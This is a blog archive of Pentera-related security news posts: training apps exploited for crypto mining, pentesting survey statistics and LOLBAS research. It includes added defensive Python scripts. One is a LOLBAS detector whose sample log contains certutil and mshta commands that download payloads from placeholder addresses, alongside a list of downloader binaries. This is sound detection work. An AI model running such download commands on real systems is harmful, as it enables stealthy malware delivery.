Archive for Pentera

Hackers Exploit Training Apps to Breach Fortune 500 Firms

Posted in Commentary with tags on January 22, 2026 by itnerd

Hackers are exploiting security training applications, including open-source projects such as OWASP Juice Shop, DVWA, and Hackazon, to breach the customer-managed cloud environments of Fortune 500 companies and security vendors.

More details can be found here: https://pentera.io/press-release/cloud-training-environments-exploited-crypto-miners/

Martin Jartelius, AI Product Director at Outpost24, provided the following comments:

“In security, it is important to refrain from victim blaming. However, when something is designed to be inherently unsafe, deployed as-is, and exposed directly to the internet, it is not even hacking in the traditional sense. Someone simply built a scanner to look for these applications, just as they do for regularly vulnerable ones, and deployed crypto miners.

What can we deduce from this? Attackers go where the value is—and today, that value is primarily in data. When attackers instead revert to deploying miners, it suggests that these systems sit in isolated networks of little value, most likely test beds for tools or teams. Embarrassing, annoying, and somewhat costly—but, even against my own principle of not blaming the victim, this should not come as a surprise to whoever put it there when it happens.”

This illustrates how quickly the bad guys can pivot in terms of finding new and creative ways to pwn their victims. Which means defenders need to find new and creative ways to match those pivots in order to not get pwned.
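The practical defence the post points at is not patching these apps (they are vulnerable by design) but making sure none of them is reachable from the internet. The script below is an added example, not code from Pentera or the original post: it walks a constructed cloud inventory and flags any workload whose name, image or tags mark it as one of the training apps named above and that also has a public address plus an ingress rule open to any source. The inventory schema, the marker substrings and the sample hosts are assumptions for illustration; adapt the matching to whatever your own asset inventory exports.

```python
"""Flag deliberately vulnerable training apps that are reachable from the internet.

Added example; the inventory schema, marker substrings and sample hosts are
constructed assumptions, not anything taken from Pentera's report.
"""
from dataclasses import dataclass, field
from ipaddress import ip_network
from typing import Dict, List, Optional

# Substrings that identify the training apps named in the post (assumption:
# deployments carry the app name in their image, host name or tags).
TRAINING_APP_MARKERS = ("juice-shop", "juiceshop", "dvwa", "hackazon")


@dataclass
class Workload:
    name: str
    image: str
    public_ip: Optional[str] = None                  # None when no public address
    ingress: List[str] = field(default_factory=list) # allowed source CIDRs
    tags: Dict[str, str] = field(default_factory=dict)


def is_training_app(w: Workload) -> bool:
    """True when name, image or any tag value names a known training app."""
    haystack = " ".join([w.name, w.image, *w.tags.values()]).lower()
    return any(marker in haystack for marker in TRAINING_APP_MARKERS)


def open_ingress_rules(w: Workload) -> List[str]:
    """Return the ingress CIDRs that admit any source (a /0 prefix, v4 or v6)."""
    return [c for c in w.ingress if ip_network(c, strict=False).prefixlen == 0]


def internet_reachable(w: Workload) -> bool:
    """A workload is internet-reachable only with a public IP and an any-source rule."""
    return w.public_ip is not None and bool(open_ingress_rules(w))


def find_exposed_training_apps(inventory: List[Workload]) -> List[dict]:
    """Return one finding per training app that the internet can reach."""
    findings = []
    for w in inventory:
        if is_training_app(w) and internet_reachable(w):
            findings.append({
                "name": w.name,
                "image": w.image,
                "public_ip": w.public_ip,
                "open_ingress": open_ingress_rules(w),
            })
    return findings


# Constructed sample inventory (documentation-range addresses, not real hosts).
SAMPLE_INVENTORY = [
    # Public IP and wide-open ingress: this is the case the post describes.
    Workload("juice-shop-lab", "bkimminich/juice-shop:latest", "203.0.113.10",
             ["0.0.0.0/0"], {"env": "training"}),
    # Training app, but private only: not a finding.
    Workload("dvwa-internal", "vulnerables/web-dvwa", None, ["10.0.0.0/8"]),
    # Public IP but ingress limited to one office range: not a finding.
    Workload("hackazon-demo", "hackazon:local-build", "203.0.113.11",
             ["198.51.100.0/24"], {"team": "appsec"}),
    # Exposed, but not a training app; out of scope for this check.
    Workload("api-gateway", "company/api:2.1", "203.0.113.12",
             ["0.0.0.0/0"], {"env": "prod"}),
]

if __name__ == "__main__":
    for finding in find_exposed_training_apps(SAMPLE_INVENTORY):
        print(f"EXPOSED TRAINING APP: {finding}")
```

Run against the sample inventory it reports only `juice-shop-lab`; the private DVWA host and the office-restricted Hackazon host pass, which is the point: the apps themselves are fine to run, the combination of public address and any-source ingress is what turns them into free compute for a miner.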

Pentera’s State of Pentesting Report Reveals Shift Towards Software-Based Pentesting

Posted in Commentary with tags on May 7, 2025 by itnerd

Pentera, the market leader in automated security validation, today announced the release of its fourth annual State of Pentesting survey report. Pentera surveyed 500 CISOs and senior security executives from enterprises with more than 3,000 employees across the United States, Germany, France, and the United Kingdom. The 2025 report offers data-driven analysis on the current state of security validation practices, budget priorities, and the key factors influencing the adoption of proactive risk management strategies.

Unthinkable a decade ago, today over 50% of enterprise CISOs report using software-based pentesting to support their in-house testing practices. Even more notable, 50% of CISOs now identify software-based testing as a primary method for uncovering exploitable security gaps within their organizations. These trends signal a broader shift toward testing approaches that offer greater scale, cover the full attack surface, and enable continuous validation of the enterprise.

Key findings from the report include:

  • 67% of US Enterprises Experienced a Breach in the Past 24 Months – Enterprise CISOs manage an average of 75 security tools across their IT environments, with 45% reporting stack growth over the past year. Despite these investments, 67% experienced a breach in the past 24 months, underscoring the persistent challenges of securing complex environments.
  • Large Security Stacks: Increased Vulnerability Data Volume – While a larger security stack increases visibility of potential issues, it also increases operational complexity, making it harder to prioritize and respond to the most critical threats. Organizations with 11–50 security tools generate an average of 883 alerts per week. Enterprises with 76–100 tools face over 2,048 alerts weekly, while those with more than 101 tools see an average of 3,074 alerts.
  • Pentesting Represents Around 11% of the Total IT Security Budget – US enterprises spend an average of $187,000 annually on pentesting which is about 10.5% of their total IT security budgets. IT Security budgets are on the rise: Over 50% of CISOs report that they will be raising their pentesting budgets in 2025 and 48% will be raising their overall IT security budgets.
  • Software-based pentesting is gaining traction – 55% of enterprises now use software-based tools to support in-house testing programs, and 50% of CISOs cite software-based testing as a primary method for uncovering exploitable security gaps within their IT environments. This reflects a growing trust in the safety of software solutions. Enterprises are shifting toward scalable adversarial testing approaches.
  • Cyber Insurance Providers are a NEW Driving Force for Technology Adoption – Cyber insurance providers are driving security control technology adoption. In the US, 58% of enterprises have implemented at least one cybersecurity solution at the request of their insurance provider. An additional 34% reported receiving recommendations for specific solutions.
  • Confidence in Government Support Is Not High – 22% of CISOs say they cannot rely on the government for cybersecurity support at all. Another 64% of US enterprises acknowledge government actions, but believe these efforts are insufficient. Only 14% believe the government is truly doing its part to help protect the private sector.

The survey was conducted by Global Surveyz, an independent research firm, from December 2024 through January 2025.

Click here to access the full report.

Cybersecurity Unicorn Pentera Discovers 12 New LOLBAS Vulnerabilities

Posted in Commentary with tags on August 3, 2023 by itnerd

Here’s a look at groundbreaking research published by Cybersecurity Unicorn Pentera, highlighting 12 new LOLBAS (Living-Off-the-Land Binaries-And-Scripts) files uncovered by Pentera security researchers.

From draining bank accounts to bypassing Windows OS security features, LOLBAS attacks continue to be a popular technique amongst hackers, and with more than 3000 binary files on Windows, discovering new LOLBAS can be challenging.

Hackers utilize these scripts to stay under the radar, exploiting legitimate tools for malicious activities. As a result of Pentera’s unique automation-driven approach, they were able to increase the number of known LOLBAS downloaders in the years-old project by 30% in just four weeks.

You can read the research here.
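Because a LOLBAS downloader is a signed, expected Windows binary, blocking the file is not an option; what a defender can watch is the binary being handed a URL it normally has no business fetching. The script below is an added detection example, not Pentera's research tooling: it parses a constructed pipe-delimited process-creation log, checks whether the image is one of a small set of binaries the public LOLBAS project lists as downloaders, and raises a finding when the command line references a host outside an assumed list of trusted internal servers. The log format, the trusted-host list and the sample events are all constructed for illustration.

```python
"""Flag LOLBAS downloader binaries invoked with an untrusted URL on the command line.

Added detection example; the log format, the trusted hosts and the sample
events are constructed, not output of Pentera's research.
"""
import re
from collections import namedtuple
from typing import Iterable, List, Optional

# Subset of Windows binaries the public LOLBAS project documents as downloaders.
# Extend from the project's own list to cover newly documented entries.
LOLBAS_DOWNLOADERS = {"certutil.exe", "bitsadmin.exe", "mshta.exe",
                      "regsvr32.exe", "curl.exe"}

# Hosts that in-house tooling legitimately fetches from (assumption: an
# internal update server named like this exists in your estate).
TRUSTED_HOSTS = {"updates.corp.example"}

# Captures the host part of http/https/ftp URLs anywhere in the command line.
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://([^/\s:'\"]+)")

Event = namedtuple("Event", "ts host user image cmdline")


def parse_event(line: str) -> Optional[Event]:
    """Parse one constructed log line: ts|host|user|image|cmdline."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    return Event(*parts)


def suspicious_download(ev: Event) -> Optional[dict]:
    """Return a finding when a LOLBAS downloader references an untrusted host."""
    exe = ev.image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in LOLBAS_DOWNLOADERS:
        return None
    hosts = [h.lower() for h in URL_RE.findall(ev.cmdline)]
    untrusted = [h for h in hosts if h not in TRUSTED_HOSTS]
    if not untrusted:
        return None
    return {"ts": ev.ts, "host": ev.host, "user": ev.user,
            "binary": exe, "remote_hosts": untrusted}


def scan(lines: Iterable[str]) -> List[dict]:
    """Run the rule over every parseable line and collect the findings."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        finding = suspicious_download(ev)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample events (documentation-range addresses, invented hosts/users).
SAMPLE_LOG = [
    r"2023-08-03T10:01:05Z|WS-042|CORP\alice|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -f http://198.51.100.7/update.bin update.bin",
    r"2023-08-03T10:02:11Z|WS-042|CORP\alice|C:\Windows\System32\certutil.exe|certutil.exe -hashfile report.pdf SHA256",
    r"2023-08-03T10:03:40Z|SRV-07|NT AUTHORITY\SYSTEM|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer job https://updates.corp.example/agent.msi C:\Temp\agent.msi",
    r"2023-08-03T10:04:02Z|WS-019|CORP\bob|C:\Program Files\Mozilla Firefox\firefox.exe|firefox.exe https://example.org",
    r"2023-08-03T10:05:59Z|WS-019|CORP\bob|C:\Windows\System32\mshta.exe|mshta.exe https://203.0.113.9/a.hta",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"LOLBAS download: {finding}")
```

The rule deliberately keys on two things together, a known downloader binary and an untrusted remote host, so the hashing use of certutil, the browser fetching a page, and the update server pulled through bitsadmin all stay quiet while the two fetches from unknown addresses surface. The weak spot is the allow-list: every new downloader Pentera or the LOLBAS project documents has to be added to `LOLBAS_DOWNLOADERS`, which is exactly why a 30% jump in known entries matters to whoever maintains the detection.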

State of Pentesting Report: 92% Increase In IT Security Budgets Despite Economic Headwinds

Posted in Commentary with tags on February 28, 2023 by itnerd

Pentera has released the findings of its second annual industry survey: The State of Pentesting 2023. Pentera undertook this research to understand the current state of security validation practices and investment in enterprises.

Pentera surveyed 300 CIOs, CISOs and security executives from enterprises across Europe and the USA. The report provides insights on current IT and security budgets, cyber security validation practices, and how cyber exposure is being managed, while showing differences between the regions and enterprise sizes.

Report highlights include:

  • Despite large investments in Defense-in-Depth strategies, 88% of organizations have suffered recent attacks – On average, companies have almost 44 security solutions in place, indicating a defense-in-depth strategy, where multiple security solutions are layered to best protect critical assets. However, despite the large number of security solutions implemented, 88% of organizations have admitted to being compromised by a cyber attack over the past two years.
  • Cybersecurity budgets aren’t impacted by the financial slowdown – Despite the recent global economic slowdown, cybersecurity budgets are not expected to be impacted in 2023. 92% of organizations are reporting a raise of their IT security budgets, and 86% are reporting a raise of budget for pentesting specifically.
  • The drivers for pentesting have evolved beyond regulations – While the need for pentesting originated with regulatory requirements, the top-of-mind motivations for pentesting today are security validation, threat potential damage impact assessment and cyber insurance. With only 22% of respondents citing compliance as their primary motivation for the practice, regulatory or executive mandates are still impactful, but not the primary rationale driving pentesting.

The results of the report will be presented by Aviv Cohen at Pentera’s XPOSURE Summit on March 1, 2023. The summit focuses on actionable methodologies for developing and executing successful Exposure Management strategies. Register online here.